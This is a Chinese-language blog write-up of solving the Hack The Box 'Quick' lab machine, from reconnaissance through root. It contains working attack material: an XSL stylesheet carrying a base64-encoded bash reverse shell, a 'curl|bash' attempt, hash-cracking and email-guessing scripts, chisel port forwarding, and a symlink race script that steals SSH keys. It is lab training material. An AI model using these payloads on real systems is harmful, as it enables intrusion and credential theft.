因为现在还没有接到确切通知说是否考试,原本期末复习的计划也被打乱了。既然现在复习觉得有点亏,于是干脆去做做hackthebox的靶机算了,正好好久没写wp了2333。
虽然没更新文章,但是其实自己每周都在跟着ippsec的视频做退役靶机。当然其实也做了5.6台现役的。不过今天要写的Quick靶机的wp是自己头一次独立完成的困难难度的靶机。真的真的学到了很多东西。所以一定要记录下。
另外由于Quick还是active状态,所以我会给文章上锁直到靶机退役。
- 靶机ip: 10.10.10.186
- 攻击机: 10.10.14.40
initial foothold
这一部分真的挺麻烦的……中间有点点脑洞的成分,但总体还是比较符合真实环境的。
首先必然是nmap端口扫描。
# Nmap 7.80 scan initiated Thu Jun 18 14:43:20 2020 as: nmap -sC -sV -oA nmap/quick 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.44s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
| 256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_ 256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 18 14:46:54 2020 -- 1 IP address (1 host up) scanned in 214.65 seconds
可以看到只开放了ssh跟9001web端口。尝试访问web页面
会发现主要信息有
- 几个标出了姓名跟公司的留言
- update处指向了一个网页
https://portal.quick.htb
同时底部clients定向到clients.php
似乎里面的公司跟前面的人名备注的公司有相同的地方。目前只能说大致可以收集一些信息。
访问login.php
发现需要用户名跟密码。不过,此处的用户名要求为邮箱登录。密码则没有什么透露的信息。
web页面的信息收集完了,就应该试试https://portal.quick.htb
了
然而奇怪的是,我们根本没有办法访问这个网页(在修改了/etc/hosts
的前提下)。尝试直接curl也同样无果。这时直接陷入僵局。
在逛了一圈htb的论坛后,发现大家提到了重新build工具这个关键信息。并且提到了,如果访问不了这个页面,是因为浏览器无法理解收到的信息。所以访问不了。并且最好尝试其他protocol.
在留意到protocol这个关键词后,我开始尝试跑一遍udp端口的nmap
# Nmap 7.80 scan initiated Fri Jun 19 20:33:51 2020 as: nmap -sU -oA nmap/quick-udp 10.10.10.186
Nmap scan report for portal.quick.htb (10.10.10.186)
Host is up (0.43s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
443/udp open|filtered https
# Nmap done at Fri Jun 19 20:50:40 2020 -- 1 IP address (1 host up) scanned in 1008.38 seconds
原来在udp的443端口有https服务。看来大概率就是我们之前的网站了。此时搜索相关信息,会发现这应该是HTTP/3协议。因为HTTP/3的一个重要特征就是将弃用TCP协议,改为使用基于UDP协议的QUIC协议实现。
可以看下维基跟这篇文章。
http3-in-curl
http/3协议虽然是新趋势,但是目前能唯一有效连接的工具还是只有curl.所以我猜测论坛里大家提到的就是重新编译curl以支持http3.
然而这一步十分耗时间,因为必须要下Quiche
重新编译,下brew
来进行包管理……总之我连brew都没下完就放弃了这个选择,因为国内实在太慢了,换了git源后又因为其他源继续龟速下载…这时我在搜索内容中注意到docker有现成的镜像。于是果断换docker进行curl。(docker的最大价值就是为我们节省了配环境的大把时间)
pull一个ymuski/curl-http3
镜像
docker run -it --rm ymuski/curl-http3 curl -V
检查下支持http3.这样就可以用--http3
来访问网址了
docker run -it --rm ymuski/curl-http3 curl https://10.10.10.186 --http3
发现几个链接。一个个访问后发现docs文档有两个pdf。
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<h1>Quick | References</h1>
<ul>
<li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
<li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>
</ul>
</head>
</html>
开始果断尝试直接-o
输出,但是却搞忘了,这里是调用的docker执行命令。那么我们的输出在镜像里面。所以我得挂载一个目录来获取输出的pdf
docker run -it --rm -v /mnt/curl:/tmp ymuski/curl-http3 curl 10.10.10.186 --http3 -o /tmp/xxx.pdf
在其中一个pdf中得到关键信息。也就是密码。
那么接下来就是尝试登录了。这也是起手式这里又一个难点。原先htb的邮箱基本上都是admin@{box的hostname}.htb
这种形式的。但是此处常规尝试都不起效果。于是只能手动写脚本组合下之前的信息。
list=[]
users=['tim','roy','elisa','james','mike','jane','john']
postfix=['qconsulting.co.uk','darkwing.com','wink.co.uk','lazycoop.cn','scoobydoo.it','penguincrop.fr']
postfix2=['qconsulting.co.uk','darkwing.com','wink.co.uk','lazycoop.com.cn','scoobydoo.co.it','penguincrop.co.fr']
postfix3=['qconsulting.htb.uk','darkwing.htb','wink.htb.uk','lazycoop.htb.cn','scoobydoo.htb.it','penguincrop.htb.fr']
def quick():
global list
for i in users:
for j in postfix:
list.append(i+'@'+j)
return list
def quick2():
global list
for i in users:
for j in postfix2:
list.append(i+'@'+j)
return list
def quick3():
global list
for i in users:
for j in postfix3:
list.append(i+'@'+j)
return list
f=open('creds.txt','w')
for email in quick():
f.write(email+'\n')
for email in quick2():
f.write(email+'\n')
for email in quick3():
f.write(email+'\n')
f.close()
最后尝试出结果后才发现其实不需要过多尝试的。但是重点(难点)就在于,它的邮箱格式非常类似真实的企业邮箱。前面我们主页面的信息结合起来后,其实每个人名对应的公司,国家都是确定的。所以我们主要注意采用二级域名即可。也就是跟在公司名后的.co.fr
,.co.it
等等。
得到用户elisa
成功登陆后,我们就要准备第三部分的利用了。这里我直觉猜测应该可以RCE,因为htb的靶机如果没法getshell的话连后面的提权都做不到。出于直觉以及最早的信息收集,我认为这里应该是从header中泄露的信息下手
注意到X-Powered-By: Esigate
后直接搜索相关信息。了解到这是一个模板相关的java服务。可以起到搭配phpcms并且将html片段进行整合的作用。并且进一步了解后发现存在RCE漏洞。
找了好几篇文章都没有关键代码。只有这篇提到了https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/
触发的payload如下,显然也是因为引入了外部的恶意xsl导致RCE。
<esi:include src="http://website.com/" stylesheet="http://evil.com/esi.xsl">
</esi:include>
这里我注意到前面的src是website.com所以我在使用自己的payload时将其改为了10.10.10.186:9001
。后来也证明如果不改的话,触发时会出现error retrieving url
的报错。
接下来则是尝试如何触发的问题。这里我按打CTF的直觉认为应该是ticket.php
传payload.search.php
传search参数进行触发。当然网页也提醒了,当你传完ticket后会返回一个预先置好的ticketid。只要在search.php
搜索对应id即可。
这里还有一个小坑。那就是java的命令执行问题。开始尝试触发时发现主要问题是:
- 一个ticket传一次后就失效了。导致我每次得更改xsl的名字。
- 命令执行
curl 10.10.10.14.40|bash
失败。估计又是java的锅。
如果稍微过一遍上面那篇文章中的xsl.会发现肯定是调用了java.lang.Runtime.getRuntime().exec()
来执行命令的。所以肯定存在单条命令特殊字符过不去的问题。当然解决方法在做vulhub
各种java反序列化时就用烂了。使用编码绕过即可。
http://jackson-t.ca/runtime-exec-payloads.html
最后我的xsl payload
<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40MC85MDAxIDA+JjE=}|{base64,-d}|{bash,-i}]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>
先raise一个ticket后准备好监听,search.php传值直接触发
到此为止即可弹到用户sam的shell。拿到user.txt
上面一套流程走下来后花了快有7个小时。只能算是配环境(甚至还没配成)跟猜用户名的锅。但同时也表现出enumeration
的过程有多重要。否则甚至不能正常进行后面的提权。java的命令执行这个小trick对于新手而言也许很坑。但是仍然是有方法的。比如wget一个netcat过去再执行(windows常规操作,尤其是在windowsdefender日渐强大的今天)。假如熟悉java的话则应该很快就能构造出弹shell的payload.不至于卡在RCE却无法getshell.
privesc to srvadm
得到用户sam后准备开始提权。首先是常规的linpeas.sh
传到靶机上扫一遍。接着是python -c 'import pty;pty.spawn("/bin/bash")'
维持shell.毕竟一套流程下来getshell也不是那么迅速的。(当然可以写个ssh公钥,就是我搞忘了2333)
脚本扫过一遍后并没有什么收获。倒是在html
的源码里找到了php的db.php
泄露了数据库信息
<?php
$conn = new mysqli("localhost","db_adm","db_p4ss","quick");
?>
登录mysql从users表里拿到两个用户及各自密码的hash
| Elisa | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
此时靶机还剩下一个要提权的用户srvadm
。这里泄露了密码,当然要去php源码里看看密码是怎么与hash进行对比的
login.php中
password=md5(crypt($password,'fa'))
既然盐值以及加密都不算难。我们直接用脚本+rockyou.txt来试试爆破
import crypt
import hashlib
def get_md5(s):
md = hashlib.md5()
md.update(s.encode('utf-8'))
return md.hexdigest()
f=open('rockyou.txt','r')
for i in range(1,10000000):
try:
word=f.readline().strip()
except:
continue
hashes=crypt.crypt(word,'fa')
cipher=get_md5(hashes)
if cipher=='e626d51f8fbfd1124fdea88396c35d05':
print('Found: '+word)
break
得到srvadm的密码后当然先试试看是不是ssh或者系统密码了。但很可惜都不是。既然如此,这个密码只能在web服务上发挥作用了。那么说还有其他web服务?
这时我注意到了/var/www/
里除了html还有两个文件夹
诡异的是jobs是777
权限。似乎可以做文章。那么转而去旁边的printer中找。发现又是一套带了cms的php源码。并且用的数据库跟之前html中的是一致的。也就是说我们爆破出的密码有用了。
简单审下后发现一个似乎存在漏洞的地方(实际上当时关注点错了)
job.php
<?php
require __DIR__ . '/escpos-php/vendor/autoload.php';
use Mike42\Escpos\PrintConnectors\NetworkPrintConnector;
use Mike42\Escpos\Printer;
include("db.php");
session_start();
if($_SESSION["loggedin"])
{
if(isset($_POST["submit"]))
{
$title=$_POST["title"];
$file = date("Y-m-d_H:i:s");
file_put_contents("/var/www/jobs/".$file,$_POST["desc"]);
chmod("/var/www/printer/jobs/".$file,"0777");
$stmt=$conn->prepare("select ip,port from jobs");
$stmt->execute();
$result=$stmt->get_result();
if($result->num_rows > 0)
{
$row=$result->fetch_assoc();
$ip=$row["ip"];
$port=$row["port"];
try
{
$connector = new NetworkPrintConnector($ip,$port);
sleep(0.5); //Buffer for socket check
$printer = new Printer($connector);
$printer -> text(file_get_contents("/var/www/jobs/".$file));
$printer -> cut();
$printer -> close();
$message="Job assigned";
unlink("/var/www/jobs/".$file);
}
catch(Exception $error)
{
$error="Can't connect to printer.";
unlink("/var/www/jobs/".$file);
}
}
else
{
$error="Couldn't find printer.";
}
}
?>
<?php }
else
{
echo '<script>alert("Invalid Username/Password");window.location.href="index.php";</script>';
}?>
其中用到的框架的部分经搜索后发现只是一个类似‘打印’功能的框架。比如NetworkPrintConnector
就是调用了一个fsockopen()
。
接下来的部分就是最让我头疼的部分。很大程度上是经验不足吧。现在既然要提权,并且有存在漏洞的web服务了,那么它肯定得是srvadm
运行的,才能让我有提权机会。然而我在找服务这里却浪费了很多时间:开始看端口发现有80端口,于是直接curl
.得到的却是之前9001端口的php+esigate页面。导致我以为80端口运行的是nginx给java做的反代。之后把靶机端口全过了一遍也没有找到哪个端口是跑的printer的web服务。甚至也没找到srvadm在运行什么服务的信息。导致自己瞬间迷茫。
之后在这块询问了下外国友人bigFish43
。他给我的提示是查看下apache的config文件。于是思路瞬间明朗起来。
在sites-enabled/000-default.conf
里找到了子域名printerv2.quick.htb
并且正如所预料的,是以srvadm用户运行的。
apache的virtualhost
跑在80端口上。不过同时我们知道html文件夹里的的服务也跑在80端口上。那么需要更改Host才能访问
靶机上curl localhost -H 'Host: printerv2.quick.htb'
后终于得到了来自printer的回显。那么下一步就是,为了直接在本地访问到printerv2.quick.htb,必须要进行端口转发了。因为我们最早nmap探测80端口时是没有开启的。说明这里apache服务是运行在本地的。
转发端口同样也有至少两种方法。ssh或者上工具chisel
。这里我没有用ssh登录,所以直接用chisel
。chisel之前做sniper也用过了。这里直接留传完chisel后的命令
#kali
./chisel_linux_amd64 server -p 8000 --reverse
#sam@quick
./chisel_linux_amd64 client 10.10.14.40:8000 R:80:127.0.0.1:80
意思就是,靶机借用8000端口的中转,把靶机的80端口转到kali的127.0.0.1:80即本地80端口.
这样就把80端口转发到本地了。接下来由于要修改hostname。因为不想影响访问之前的网址。直接开个burp来修改Host header.
只要保持burp打开,我们每次访问的Host都会被替换.
即可在本地访问进行操作。
接下来就是渗透的难点了。前面提到说job.php看起来有漏洞,但究竟漏洞在哪?开始我觉得有漏洞是因为里面出现了chmod(xxx,777)
。但仔细一看却发现那个/var/www/printer/jobs
路径不存在?既然如此,代码逻辑就是:
- 接受我们post的参数,执行
file_put_contents()
在/var/www/jobs
写入一个文件名为当前日期的文件。并且chmod一个不存在的文件。 - 执行sql查询。假如jobs库里有内容。按照查询结果远程连接到对应的ip,port.sleep(0.5)后执行
file_get_contents()
读我们之前的文件,并最后删除;jobs库无内容直接退出。
这里卡了好久后我突然想起来/var/www/jobs
文件夹是777权限。那么我们可以写文件这点就非常重要。于是立刻就有了两种使用短链接的条件竞争
不要在数据库中插入新数据。这样srvadm创建的文件就会留下来。如果我们提前创建一个同名文件(因为文件名为时间这点是可预测的)。并利用短链接将其链接向srvadm的sshkey.那么执行
file_put_contents()
时不就可以写入我们自己的公钥了吗?在前面printer.php就输入host跟port.即在数据库插入数据。这样job.php就会进行读文件并打印内容。而我们可以用nc接收。只要在写文件跟读文件的间隔中删掉文件并建立一个到ssh私钥的短链接。php就会把读到的私钥发给我们。
这里两种思路同时想到,我立刻选择了前者。因为后者算比较纯粹的条件竞争,时间不好把控(所以叫Quick
),我选择前者。
操作起来比想象中简单。我一次就成了。假如同时做靶机的人比较多的话就另谈,
其实就是算好一个提前量。并且执行
ln -s /home/srvadm/.ssh/authorized_keys 2020-06-23_06:00:00
然后差不多算好时间提前burp重复发包。
这里因为精度被限制在1s.所以写入我们的key的可能性不小。
之后直接ssh登录即可
chmod 600 id_rsa
ssh -i id_rsa srvadm@10.10.10.186
这里我虽然没试第二种思路,但做完靶机后看到其他人的wp里写到了解决方法:
执行一个bashscript
cd /var/www/jobs;
while true;
do
for file in $(ls .);
do
rm -rf $file;
ln -s /home/srvadm/.ssh/id_rsa $file;
done
done
然后起一个nc监听。并在job.php提交内容写入。这样就能得到私钥并且直接登录了。
这段内容其实花的时间不比第一部分少。甚至于我遇到的困难更多。比如在找服务上太傻了。之后想起运行pspy64s时也发现了系统是有apache服务跑着的。那肯定就得去找配置文件。结果自己只看了apache的apache2.conf
就了事了。该打。然后就是后面的漏洞利用。那个chmod着实害人,开始还想着把短链接链到那个不存在的文件。仔细一想才发现其实直接链到key就可了。
privesc to root
到root的部分才是真正的Quick
。只需要待在自己的home文件夹进行enum即可。
这里按照sshkey的创建时间,找一下3-21之前一个月不到的文件。
srvadm@quick:/home/srvadm# find . -type f -newermt "2020-03-01" ! -newermt "2020-03-21" -ls 2>/dev/null
281794 4 -rw-r--r-- 1 srvadm srvadm 4038 Mar 20 06:23 ./.cache/conf.d/printers.conf
281793 8 -rw-r--r-- 1 srvadm srvadm 4569 Mar 20 06:20 ./.cache/conf.d/cupsd.conf
281799 72 -rw-rw-r-- 1 srvadm srvadm 71479 Mar 20 06:46 ./.cache/logs/debug.log
281798 4 -rw-rw-r-- 1 srvadm srvadm 1136 Mar 20 06:39 ./.cache/logs/error.log
281791 12 -rw-r--r-- 1 srvadm srvadm 9064 Mar 20 06:19 ./.cache/logs/cups.log
281425 0 -rw-r--r-- 1 srvadm srvadm 0 Mar 20 02:38 ./.cache/motd.legal-displayed
281369 4 -rw-r--r-- 1 srvadm srvadm 220 Mar 20 02:16 ./.bash_logout
281797 4 -rw------- 1 srvadm srvadm 23 Mar 20 06:46 ./.local/share/nano/search_history
281421 4 -rw-r--r-- 1 srvadm srvadm 222 Mar 20 02:38 ./.ssh/known_hosts
281418 4 -rw------- 1 srvadm srvadm 1679 Mar 20 02:37 ./.ssh/id_rsa
281419 4 -rw-r--r-- 1 srvadm srvadm 394 Mar 20 02:37 ./.ssh/id_rsa.pub
281370 4 -rw-r--r-- 1 srvadm srvadm 3771 Mar 20 02:16 ./.bashrc
281371 4 -rw-r--r-- 1 srvadm srvadm 807 Mar 20 02:16 ./.profile
一个个读后发现关键信息在
./.cache/conf.d/printers.conf
DeviceURI https://srvadm@quick.htb:&ftQ4K3SGde8?@printerv3.quick.htb/printer
之前学ssrf时总结过url的属性。username:password@host
的格式告诉了我们&ftQ4K3SGde8?
密码。所以直接尝试su到root。直接拿到rootshell.
ssh也是同样
summary
本次渗透前后花了不少时间。相比之前看ippsec视频做退役靶机,独立完成一台困难靶机真的感觉很不错,也很艰辛。当然,能完整做完很大程度上是因为这台靶机的内容很适合CTF的web选手。自己在很多地方也都运用到了自己日常比赛时的小技能。同时靶机关于http/3,xslt->RCE,提权方法等等都有很大收获。所以非常赞。
其实前前后后做了快20多台HTB靶机,感觉自己经常卡在enumeration
也就是枚举(信息收集)上。而这往往是解决问题的关键。希望能够多锻炼下自己这方面的能力吧。